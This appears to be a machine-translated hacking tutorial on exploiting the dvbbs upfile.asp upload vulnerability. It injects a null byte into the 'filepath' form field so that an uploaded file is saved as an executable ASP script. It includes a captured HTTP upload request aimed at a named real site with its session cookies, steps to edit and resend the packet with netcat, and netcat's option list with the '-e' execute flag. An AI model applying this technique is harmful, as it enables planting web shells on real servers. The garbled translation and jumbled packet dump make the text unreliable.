1: この脆弱性が悪用される原則は、フォーム形式でアップロードされた asp および php スクリプトのみです*** データ パッケージの送信には nc (netcat) が使用され、DOS インターフェイスで実行されます: nc -vv www.***.com 80 2: 脆弱性の原理 次の例では、www ホスト: www.***.com、bbs パス: /bbs/ を想定しています。この脆弱性は、インターネットにアップロードされたファイルの調査から発生したものであると考えられます。プログラミングの経験がある方は、dvbbs の upfile.asp ファイルを見てください。これは必要ありません。upfile がフォームの生成によってアップロードされること、および使用される変数が次のとおりであることを理解してください。 file1 は転送するファイルです。キーは filepath 変数です。デフォルトでは、www.***.com/bbs/uploadface/ にアップロードされたファイルの名前は、filename= という文になります。フォームパス&年(現在)&月(現在)&日(現在)&時間(現在)&分(アップファイル現在)&秒(現在)&rannum&"."&fileext ------------------- ------------------- us コンピュータ内のデータが "" であることは、C 言語を使用したことがある人なら誰でも知っています。char data[]="bbs" の長さは次のとおりです。このデータ配列の値は 4 です: b b s 次のようにファイルパスを構築するとどうなりますか? filepath="/newmm.asp" 2004.09.24.08.24 にアップロードしたファイルは次のように変更されます: _blank>http://www.** *.com/bbs/uploadface/200409240824.jpg 構築したファイルパスを使用する場合: _blank>http://www.***.com/newmm.asp/200409240824.jpg このようにして、サーバーがファイルパス データを受信すると、このようにして、アップロードしたファイル (たとえば、c:.asp) は、_blank>http://www.***.com として保存されます。 /newmm.asp 3: 後の追加の脆弱性の発表後、多くの Web サイトが対応する処理を行っていますが、ファイルパスのフィルタリングと処理は行われていません。アップファイルに対処するために、隠し属性を持つ n 個の変数を追加するだけの Web サイトが多くあります。オンラインで公開されている .exe は、アップロード脆弱性悪用ツールまたはファイルパス変数悪用ツール (ベテランのもの) です...しかし、最も基本的なものは変更されていません。 。 そして、Web サイトのプラグインにも同様の脆弱性があります。私が言いたいのは、wse でキャプチャしたパッケージ内のファイルパス変数を自分で変更し、nc で送信することです。 。 。 たとえ n 個の隠し変数を追加したとしても、役に立ちません。 もちろん、ファイルパスが厳密にフィルタリングされれば、私たちの理論は終わりを迎えます。そのとき、私たちの新しい理論が生まれます。 4: 詳細な例: ---------------- ----- 1. WSE パケット キャプチャ結果 (1.txt に保存): post /bbs/upphoto/upfile.asp http/1.1 accept: image/gif、image/x-xbitmap、image/jpeg、image/ pjpeg 、application/x-shockwave-flash、application/vnd.ms-excel、application/vnd.ms-powerpoint、application/msword、*/* リファラー: _blank>http://www.xin126.com/bbs/upphoto / Upload.asp 受け入れ言語: zh-cn コンテンツ タイプ: multipart/form-data; 境界=----------7d423a138d0278 受け入れエンコーディング: gzip、deflate ユーザー エージェント: mozilla/4.0 (互換性あり) ; msie 6.0; Windows NT 5.1; .net clr 1.1.4322) ホスト: _blank>www.xin126.com コンテンツ長: 1969 接続: キープアライブ キャッシュ制御: キャッシュなし Cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; ; gamvancookies=1; regtime=2d9%2d24+3%3a39%3a37; dl=0; ltstyle=1; -------------------------7d423a138d0278 コンテンツの配置: フォームデータ; name="ファイルパス" ../medias/myphoto/ --- - ----------------------------7d423a138d0278 ... ... アップロード-------------- -7d423a138d0278 ------------------ 2. Ultraedit で 1.txt を開き、データを変更します。 ...... ----------- ------- ------------7d423a138d0278 content-disposition: form-data; name="filepath" /newmm.asp█ www.xin126.com 80 16 ビット表現: 0x00 または 00h 実際には、それを変更しました。その後、ファイルパスの末尾に 00 を追加するだけで問題ありません。Cookie の長さを計算します ===> ファイルパスを変更した後、それは + または - の長さでなければなりません。 Cookie が変更されました... host: _blank>www .xin126.com content-length: 1969 私たちの解決策は、ファイルパスを定数にすることです。 。 。現時点ではこの方法が一番効果的(だと思います) 2. の処理を強化すると、ここを読み込むとそのまま次の変数の先頭まで読み込んで処理がOKになることが分かりました。 : NC 使用法: 外部ホストの監視 nc [-options] hostname port[s] [ports] ... ローカル ホスト nc をリッスンする -l -p port [options] [hostname] [port] オプション: -d コンソールから切り離し、ステルス モード -e prog 実行する受信プログラム [危険!!] -g ゲートウェイ ソース ルーティング ホップ ポイント [s]、最大 8 -g num ソース ルーティング ポインタ: 4、8、12、... -h this cruft -i 秒の送信回線の遅延間隔、ポートのスキャン -l リッスン モード、インバウンド接続の場合 -l よりハードにリッスン、ソケット クローズ時に再リッスン -n 数値のみの IP アドレス、DNS なし -o ファイル 16 進数のトラフィック ダンプ -p ポートローカル ポート番号 -r ローカル ポートとリモート ポートをランダム化する -s addr ローカル ソース アドレス -t telnet ネゴシエーションに応答する -u udp モード -v 冗長 [より詳細にするには 2 回使用します] -w 秒の接続と最終ネット読み取りのタイムアウト -z ゼロ- i/o モード [スキャンに使用] ポート番号は個別または範囲: m-n (両端を含む)